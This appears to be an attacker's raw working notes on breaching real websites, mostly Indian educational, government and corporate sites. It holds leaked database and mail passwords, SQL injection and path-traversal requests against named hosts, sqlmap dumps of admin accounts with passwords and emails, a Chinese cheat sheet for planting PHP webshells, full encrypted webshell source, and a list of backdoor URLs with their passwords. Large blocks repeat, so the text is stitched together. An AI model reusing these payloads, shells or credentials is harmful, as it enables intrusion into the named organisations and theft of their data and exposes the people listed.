

https://cmai.in/

DB_CONNECTION=mysql
DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=cmai-event-2021
DB_USERNAME=root
DB_PASSWORD=s@LCm@!Mumba$F@f


REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=md.qlc.co.in
MAIL_PORT=2700
MAIL_USERNAME=maildirect@cmai.in
MAIL_PASSWORD=B3H@ppyA!way5
MAIL_ENCRYPTION=null
MAIL_FROM_ADDRESS=registration@cmai.in
MAIL_FROM_NAME=CMAI
MAIL_CC_ADDRESS=registration@cmai.in
MAIL_CC_ADDRESS_2=registration@cmai.in

GET /.git/config HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: cmai.in
Connection: Keep-alive



nal.net.in

APP_ENV=local
APP_DEBUG=true
APP_KEY=base64:mSdPNUZN2f397ZzIlbtzZMVNeus1bftd3rv8RiJaerM=
APP_URL=http://localhost

DB_CONNECTION=mysql
DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=nal_web
DB_USERNAME=nal_web
DB_PASSWORD=@G~NJMGrYw5D

CACHE_DRIVER=file
SESSION_DRIVER=file
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=mailtrap.io
MAIL_PORT=2525





https://nationallawuniversitydelhi.in/

POST /api/v1/external/anonymousCall HTTP/1.1
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: https://nationallawuniversitydelhi.in/
Content-Length: 170
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: nationallawuniversitydelhi.in
Connection: Keep-alive

{"path":"../../../../../../../../../../../../../../../proc/version","user_id":"","academic_year_id":"","call_meta_data":"ailet.AILETAdmissionService.getMustacheTemplate"}







https://iec.edu.in/

APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:pHd1XcmGu0wjdXcNXfezU+JpEpVp26tbPrR8aXvHQtE=
APP_DEBUG=true
APP_URL=http://ieccollge.test

LOG_CHANNEL=stack
LOG_DEPRECATIONS_CHANNEL=null
LOG_LEVEL=debug

DB_CONNECTION=mysql
DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=iecdatabase
DB_USERNAME=tushariec
DB_PASSWORD=ieccet@123

BROADCAST_DRIVER=log
CACHE_DRIVER=file
FILESYSTEM_DRIVER=local
QUEUE_CONNECTION=sync
SESSION_DRIVER=file
SESSION_LIFETIME=120

MEMCACHED_HOST=127.0.0.1

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_MAILER=smtp





# Nmap 7.94 scan initiated Mon Aug 28 15:41:11 2023 as: nmap --script=vuln -sV -Pn -oN result-jitnashik.edu.in jitnashik.edu.in
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for jitnashik.edu.in (138.128.180.226)
Host is up (0.13s latency).
rDNS record for 138.128.180.226: server.chittaranjan.co.in
Not shown: 981 filtered tcp ports (no-response)
PORT      STATE  SERVICE  VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp      Pure-FTPd
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_WITH_AES_256_GCM_SHA384
|             Modulus Type: Non-safe prime
|             Modulus Source: RFC5114/2048-bit DSA group with 256-bit prime order subgroup
|             Modulus Length: 2048
|             Generator Length: 2048
|             Public Key Length: 2048
|     References:
|_      https://www.ietf.org/rfc/rfc2246.txt
22/tcp    closed ssh
25/tcp    open   smtp?
53/tcp    open   domain   ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
| vulners: 
|   cpe:/o:redhat:enterprise_linux:7: 
|     	SSV:93135	10.0	https://vulners.com/seebug/SSV:93135	*EXPLOIT*
|     	SSV:92513	10.0	https://vulners.com/seebug/SSV:92513	*EXPLOIT*
|     	SSV:92510	10.0	https://vulners.com/seebug/SSV:92510	*EXPLOIT*
|     	SSV:92405	10.0	https://vulners.com/seebug/SSV:92405	*EXPLOIT*
|     	PACKETSTORM:165816	10.0	https://vulners.com/packetstorm/PACKETSTORM:165816	*EXPLOIT*
|     	PACKETSTORM:143369	10.0	https://vulners.com/packetstorm/PACKETSTORM:143369	*EXPLOIT*
|     	PACKETSTORM:139491	10.0	https://vulners.com/packetstorm/PACKETSTORM:139491	*EXPLOIT*
|     	PACKETSTORM:139476	10.0	https://vulners.com/packetstorm/PACKETSTORM:139476	*EXPLOIT*
|     	PACKETSTORM:138678	10.0	https://vulners.com/packetstorm/PACKETSTORM:138678	*EXPLOIT*
|     	EXPLOITPACK:BD83B747C6C6A417D97824A1D81FAA5D	10.0	https://vulners.com/exploitpack/EXPLOITPACK:BD83B747C6C6A417D97824A1D81FAA5D	*EXPLOIT*
|     	EXPLOITPACK:55F22FE44A0D6F3F9005C334804B2317	10.0	https://vulners.com/exploitpack/




GET /.git/config HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: chandrakantdadapatil.in
Connection: Keep-alive





SMK

GAADMIN1
GAADMIN2


GAADMIN1
A2222221

SMKCCOM1
SMKCCOM2

SMKCDCO1
SMKCDCO2

usrTND01 Jadhav 
TND11112

AUDIT001
A1111112

usrTND01
TND11112

SMKCDCO1
SMKCDCO2



https://msso.in/admin-login.php



POST /insert-book-seat.php HTTP/1.1
Host: msso.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 358
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
Authorization: 990043eb-92e8-4c68-90c8-2d2ab5f98348
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=557861cfc798735a7b7388de269161da
Origin: https://msso.in
Referer: https://msso.in/book-seat.php
Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Brave";v="116"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

City=WW&Confirmation=No&Mobile=2344443333%27and%28select%2Afrom%28select%2Bsleep%2810%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&Name=SDSD&Title=%E0%A4%B8%E0%A4%AE%E0%A4%BE%E0%A4%A8+%E0%A4%A8%E0%A4%BE%E0%A4%97%E0%A4%B0%E0%A4%BF%E0%A4%95+%E0%A4%B8%E0%A4%82%E0%A4%B9%E0%A4%BF%E0%A4%A4%E0%A4%BE+%E0%A4%95%E0%A5%8D%E0%A4%AF%E0%A4%BE+%E0%A4%B9%E0%A5%88



0x01 into outfile
$ show global variables like '%secure%';
$ select '<?php eval($_POST[yyj]);?>' into outfile "C/phpstudy/www/shell.php";
$ sqlmap -u xxx --sql-shell
$ select @@datadir; #查看文件路径（mysql/data的路径，根目录一般与mysql处于同一目录）
$ select @@secure_file_priv;
0x02 --os-shell
1.原理
--os-shell就是使用udf提权获取webshell。也是通过into outfile向服务器写入两个文件，一个可以直接执行系统命令，另一个可以上传文件。需要知道网站根目录以及数据库dba权限。

$ sqlmap -u xxx --os-shell
0x03 写日志
尝试用日志写入木马getshell不需要secure_file_priv没有具体值，但是需要知道网站根目录。

$ show global variables like '%general%'  #查看日志功能是否开启
$ set global general_log = 'ON' #未开启的话设置为on
$ set global general_log_file = 'C:/phpStudy1/WWW/yyj.php'
$ select '<?php @eval($_POST[yyj]); ?>' 




42betipl@gmail.com
42Bet421234

使用会话编号
tmux attach -t 0
tmux kill-session -t 0

===========================
shell dork
404-server!! 
===========================
<?php
@error_reporting(0);
session_start();
    $key="faba3e98e029c12e"; 
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

===========================
indiacements.co.in
https://indiacements.co.in/info.php
Database: iclsugar
Table: dbs_adminusers
[2 entries]
+---------+------------------------------+---------------+--------+------------------+----------+------------------------------------------+-----------------+-----------+-------------+
| adminid | email                        | name          | logged | created          | status   | password                                 | username        | admintype | logout_time |
+---------+------------------------------+---------------+--------+------------------+----------+------------------------------------------+-----------------+-----------+-------------+
| 1       | thulasiram.pixel@gmail.com   | Administrator | 0      | 2011-12-30 12:24 | 1        | f78ea0aa6c5f54caee31368283cdd62f         | coromandeladmin | 1         | 1660649312  |
| 31      | websupport@pixel-studios.com | Pixel Admin   | 1      | 2016-12-16 11:10 | 1        | 827ccb0eea8a706c4c34a16891f84e7b (12345) | pixeladmin      | 1         | 1519970600  |
+---------+------------------------------+---------------+--------+------------------+----------+------------------------------------------+-----------------+-----------+-------------+

[16:37:50] [INFO] table 'iclsugar.dbs_adminusers' dumped to CSV file '/root/.local/share/sqlmap/output/indiacements.co.in/dump/iclsugar/dbs_adminusers.csv'
[16:37:50] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/indiacements.co.in'


===========================
https://bsptcl.in/admin/

=====================================================
patkarvardecollege.edu.in



======================================================

www.emamiltd.in

Database: Emam192213bc
Table: tbladmin
[3 entries]
+----+----------------------------+------------------+---------+----------+----------+------------------+----------+-----------+
| id | sessionid                  | email            | phone   | status   | lastname | password         | username | firstname |
+----+----------------------------+------------------+---------+----------+----------+------------------+----------+-----------+
| 1  | evanqn4gt9dot4479mnl5rl0d0 | info@emamiltd.in | <blank> | 0        | <blank>  | EMAMILIMITED123@ | admin    | emami     |
| 2  | gh7r451gfi2h8fph91p9l1pqo7 | <blank>          | <blank> | 0        | <blank>  | bcwtest          | bcwtest  | <blank>   |
| 3  | q4d6jb22qi7mkp9kr3mrpbu0r6 | <blank>          | <blank> | 0        | <blank>  | eadmin@123!@#    | eadmin   | <blank>   |
+----+----------------------------+------------------+---------+----------+----------+------------------+----------+-----------+

[16:07:00] [INFO] table 'Emam192213bc.tbladmin' dumped to CSV file '/root/.local/share/sqlmap/output/www.emamiltd.in/dump/Emam192213bc/tbladmin.csv'
[16:07:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/www.emamiltd.in'
======================================================
siddharthagroup.co.in

back-end DBMS: MySQL >= 5.6
Database: arise_sgidb
Table: users
[1 entry]
+----+----------------------------------+----------------------------+---------------------+
| id | password                         | username                   | created_at          |
+----+----------------------------------+----------------------------+---------------------+
| 21 | d020bdd021278a0b91a6637c77a8372e | info@siddharthagroup.co.in | 2020-05-22 23:28:36 |
+----+----------------------------------+----------------------------+---------------------+

[09:59:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/siddharthagroup.co.in'

sql-shell> select @@datadir
[16:01:25] [INFO] fetching SQL SELECT statement query output: 'select @@datadir'
select @@datadir: '/var/lib/mysql/'
======================================================

https://apsfl.in/admin/
https://apsfl.in/image/slide/
https://apsfl.in/phpmyadmin/
https://apsfl.in/readme.html
Access denied for user 'u257628625_apsfl'@'localhost' (using password: YES)
/home/apsflin/public_html/apfiber_api/
/home/apsflin/public_html/image/
this is APSFL application

======================================================


bcetgsp.ac.in


[16:32:56] [WARNING] reflective value(s) found and filtering out
[16:32:57] [INFO] fetching entries for table 'tbl_user' in database 'db_bcet'
Database: db_bcet
Table: tbl_user
[2 entries]
+---------+-----------+---------------------+---------------+---------------------+
| user_id | user_name | user_regdate        | user_password | user_last_login     |
+---------+-----------+---------------------+---------------+---------------------+
| 9       | zoom      | 2009-04-08 20:00:01 | zoom1231      | 2023-07-17 01:31:03 |
| 10      | admin     | 2009-04-13 01:06:27 | admin50638    | 2023-02-25 11:17:47 |
+---------+-----------+---------------------+---------------+---------------------+

[16:32:59] [INFO] table 'db_bcet.tbl_user' dumped to CSV file '/root/.local/share/sqlmap/output/bcetgsp.ac.in/dump/db_bcet/tbl_user.csv'
[16:32:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/bcetgsp.ac.in'
======================================================
https://upcrndp.gov.in/

https://upcrndp.gov.in//wp-content/uploads/ua.php?1=bj 密码2

upcrndp.gov.in
/var/www/html/upcrndp-website/wp-content/


define('DB_NAME', 'upcrndp'); // Production
#define('DB_NAME', 'upcrndp_website');
#define('DB_NAME', getenv('DB_NAME'));

/** MySQL database username */
define('DB_USER', 'upcrndp'); // Production
#define('DB_USER', 'root');
#define('DB_USER', getenv('DB_USER'));

/** MySQL database password */
define('DB_PASSWORD', 'kpr?Cqc*n$2QUyWew'); // Production
#define('DB_PASSWORD', 'root');
#define('DB_PASSWORD', getenv('DB_PASSWORD'));
https://upcrndp.gov.in/

https://upcrndp.gov.in//wp-content/plugins/captcha/bws_menu/icons/.h..php?filesrc=/var/www/html/upcrndp-website/wp-config.php&path=/var/www/html/upcrndp-website
======================================================

https://cstep.in/phpmyadmin/



======================================================
mau.ac.in
Database: mau
Table: adminusers
[1 entry]
+----+------------------+---------------+---------------------+
| id | password         | username      | lastlogin           |
+----+------------------+---------------+---------------------+
| 1  | @!!786!mau#T2023 | mauUniversity | 2021-09-23 18:34:21 |
+----+------------------+---------------+---------------------+

[16:22:53] [INFO] table 'mau.adminusers' dumped to CSV file '/root/.local/share/sqlmap/output/mau.ac.in/dump/mau/adminusers.csv'
[16:22:53] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/mau.ac.in'

[*] ending @ 04:22:53 PM /2023-09-03/
======================================================
wx.renminguanjia.com/cms/upload/images/2023/09/01/1693555256mVXQ.php?/eanver=left
www.hongszg.com/favicon.php
getpwd=adminx

www.szbwzx.com/uppic/20230830060021.php?/eanver=left
tpq891
ahsdyyb.com/config/web.ini.php
admin
yxlxm.cn/indclude/ckeditor/
zdwx.aydzd.cn/cms/upload/images/2023/09/03/1693726684ykzh.php?eanver=left

www.wahhang.com/magane.imange/adminm.asp
sk-app.cn/swiper/x.aspx
www.jasongen.com/aspx/tt.aspx   hello
www.langchen.cn/demo_files/tt.aspx?hello

www.fzgcgl.com/1.php 987654321
www.smt120.com/x.php eanver=left
www.eastwits.com/skin/js/newfile.php eanver=left
www.jxboyaa.com/1.php   987654321
www.dlmz.tech/1.php   987654321
jinanguanjin.com/da.asp folderpath
www.eyesmart.com.cn/test1/php  eanver=left
======================================================

https://faculty.learnpunjabi.org/

http://colleges.learnpunjabi.org/login.php

===========================
wahhang.com/EN/js/560.asp/  
Action=EditFile&FName=H:\wwwwroot\wahhang\wwwroot\index.asp

https://www.sntd.in/snttollmelli/forms/login.aspx

www.gbdkfq.com/q.php
===========================
https://cmai.in/

DB_CONNECTION=mysql
DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=cmai-event-2021
DB_USERNAME=root
DB_PASSWORD=s@LCm@!Mumba$F@f


REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

===========================
MAIL_DRIVER=smtp
MAIL_HOST=md.qlc.co.in
MAIL_PORT=2700
MAIL_USERNAME=maildirect@cmai.in
MAIL_PASSWORD=B3H@ppyA!way5
MAIL_ENCRYPTION=null
MAIL_FROM_ADDRESS=registration@cmai.in
MAIL_FROM_NAME=CMAI
MAIL_CC_ADDRESS=registration@cmai.in
MAIL_CC_ADDRESS_2=registration@cmai.in
===========================


===========================
nal.net.in

APP_ENV=local
APP_DEBUG=true
APP_KEY=base64:mSdPNUZN2f397ZzIlbtzZMVNeus1bftd3rv8RiJaerM=
APP_URL=http://localhost

DB_CONNECTION=mysql
DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=nal_web
DB_USERNAME=nal_web
DB_PASSWORD=@G~NJMGrYw5D

CACHE_DRIVER=file
SESSION_DRIVER=file
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=mailtrap.io
MAIL_PORT=2525



=============================

https://nationallawuniversitydelhi.in/

POST /api/v1/external/anonymousCall HTTP/1.1
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: https://nationallawuniversitydelhi.in/
Content-Length: 170
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: nationallawuniversitydelhi.in
Connection: Keep-alive

{"path":"../../../../../../../../../../../../../../../proc/version","user_id":"","academic_year_id":"","call_meta_data":"ailet.AILETAdmissionService.getMustacheTemplate"}

=============================

https://iec.edu.in/

APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:pHd1XcmGu0wjdXcNXfezU+JpEpVp26tbPrR8aXvHQtE=
APP_DEBUG=true
APP_URL=http://ieccollge.test

LOG_CHANNEL=stack
LOG_DEPRECATIONS_CHANNEL=null
LOG_LEVEL=debug

DB_CONNECTION=mysql
DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=iecdatabase
DB_USERNAME=tushariec
DB_PASSWORD=ieccet@123

BROADCAST_DRIVER=log
CACHE_DRIVER=file
FILESYSTEM_DRIVER=local
QUEUE_CONNECTION=sync
SESSION_DRIVER=file
SESSION_LIFETIME=120

MEMCACHED_HOST=127.0.0.1

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_MAILER=smtp


=============================


# Nmap 7.94 scan initiated Mon Aug 28 15:41:11 2023 as: nmap --script=vuln -sV -Pn -oN result-jitnashik.edu.in jitnashik.edu.in
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for jitnashik.edu.in (138.128.180.226)
Host is up (0.13s latency).
rDNS record for 138.128.180.226: server.chittaranjan.co.in
Not shown: 981 filtered tcp ports (no-response)
PORT      STATE  SERVICE  VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp      Pure-FTPd
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_WITH_AES_256_GCM_SHA384
|             Modulus Type: Non-safe prime
|             Modulus Source: RFC5114/2048-bit DSA group with 256-bit prime order subgroup
|             Modulus Length: 2048
|             Generator Length: 2048
|             Public Key Length: 2048
|     References:
|_      https://www.ietf.org/rfc/rfc2246.txt
22/tcp    closed ssh
25/tcp    open   smtp?
53/tcp    open   domain   ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
| vulners: 
|   cpe:/o:redhat:enterprise_linux:7: 
|     	SSV:93135	10.0	https://vulners.com/seebug/SSV:93135	*EXPLOIT*
|     	SSV:92513	10.0	https://vulners.com/seebug/SSV:92513	*EXPLOIT*
|     	SSV:92510	10.0	https://vulners.com/seebug/SSV:92510	*EXPLOIT*
|     	SSV:92405	10.0	https://vulners.com/seebug/SSV:92405	*EXPLOIT*
|     	PACKETSTORM:165816	10.0	https://vulners.com/packetstorm/PACKETSTORM:165816	*EXPLOIT*
|     	PACKETSTORM:143369	10.0	https://vulners.com/packetstorm/PACKETSTORM:143369	*EXPLOIT*
|     	PACKETSTORM:139491	10.0	https://vulners.com/packetstorm/PACKETSTORM:139491	*EXPLOIT*
|     	PACKETSTORM:139476	10.0	https://vulners.com/packetstorm/PACKETSTORM:139476	*EXPLOIT*
|     	PACKETSTORM:138678	10.0	https://vulners.com/packetstorm/PACKETSTORM:138678	*EXPLOIT*
|     	EXPLOITPACK:BD83B747C6C6A417D97824A1D81FAA5D	10.0	https://vulners.com/exploitpack/EXPLOITPACK:BD83B747C6C6A417D97824A1D81FAA5D	*EXPLOIT*
|     	EXPLOITPACK:55F22FE44A0D6F3F9005C334804B2317	10.0	https://vulners.com/exploitpack/




GET /.git/config HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: chandrakantdadapatil.in
Connection: Keep-alive


SMK

GAADMIN1
GAADMIN2

GAADMIN1
A2222221

SMKCCOM1
SMKCCOM2

SMKCDCO1
SMKCDCO2

usrTND01 Jadhav 
TND11112

AUDIT001
A1111112

usrTND01
TND11112

SMKCDCO1
SMKCDCO2

===============

172.24.43.19

===============

https://msso.in/admin-login.php



POST /insert-book-seat.php HTTP/1.1
Host: msso.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 358
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
Authorization: 990043eb-92e8-4c68-90c8-2d2ab5f98348
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=557861cfc798735a7b7388de269161da
Origin: https://msso.in
Referer: https://msso.in/book-seat.php
Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Brave";v="116"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

City=WW&Confirmation=No&Mobile=2344443333%27and%28select%2Afrom%28select%2Bsleep%2810%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&Name=SDSD&Title=%E0%A4%B8%E0%A4%AE%E0%A4%BE%E0%A4%A8+%E0%A4%A8%E0%A4%BE%E0%A4%97%E0%A4%B0%E0%A4%BF%E0%A4%95+%E0%A4%B8%E0%A4%82%E0%A4%B9%E0%A4%BF%E0%A4%A4%E0%A4%BE+%E0%A4%95%E0%A5%8D%E0%A4%AF%E0%A4%BE+%E0%A4%B9%E0%A5%88


================================

[Status: 200, Size: 60, Words: 3, Lines: 1, Duration: 3356ms]
    * FUZZ: 9290018013  8317845

[Status: 200, Size: 60, Words: 3, Lines: 1, Duration: 3357ms]
    * FUZZ: 9290046081  8317847

[Status: 200, Size: 60, Words: 3, Lines: 1, Duration: 2065ms]
    * FUZZ: 9290034027  

[Status: 200, Size: 60, Words: 3, Lines: 1, Duration: 2194ms]
    * FUZZ: 9290024604  8317854

[Status: 200, Size: 60, Words: 3, Lines: 1, Duration: 2021ms]
    * FUZZ: 9290014594   8317855

[Status: 200, Size: 60, Words: 3, Lines: 1, Duration: 2298ms]
    * FUZZ: 9290012816   8317856

[WARN] Caught keyboard interrupt (Ctrl-C



https://focus-its.com
https://www.purerummy.in
https://www.admin.dhakachamber.com
https://sarkarinotification.net:8443
https://moodle401.viratraaz.xyz
https://admin.kriadl.com
http://vps.99marriageguru.com
https://zd-app.gobony.in
http://www.focus-its.com
http://www.focus-its.com
https://www.advancepharmachem.in
https://satheschemes.com
https://suitecrm.cloudsupporthub.com
https://order.bhenadadhaba.com
https://www.magnamicro.com/.vscode/sftp.json
https://outreal.in
https://nss.sajith.com
https://cylinderwala.com.bd
https://stafftraining.valluvanadu.in
http://yh.mp-mta3.in
https://t.yh.mp-mta3.in
https://www.techablog.com
https://taxihireinamritsar.com
https://aajmi.co.in
https://kuckoo.app			  
https://evisaemirates.com
http://www.mytoday.com


